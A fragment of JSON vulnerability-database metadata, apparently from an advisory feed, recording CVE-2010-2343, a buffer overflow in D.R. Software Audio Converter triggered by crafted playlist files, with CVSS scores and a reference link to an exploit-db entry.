"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13760/"}], "cve": [{"lastseen": "2019-05-29T18:10:28", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in D.R. Software Audio Converter 8.1, 2007, and 8.05 allows remote attackers to execute arbitrary code via a crafted pls playlist file.", "modified": "2017-08-17T01:32:00", "id": "CVE-2010-2343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2343", "published": "2010-06-21T15:30:00", "title": "CVE-2010-2343", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
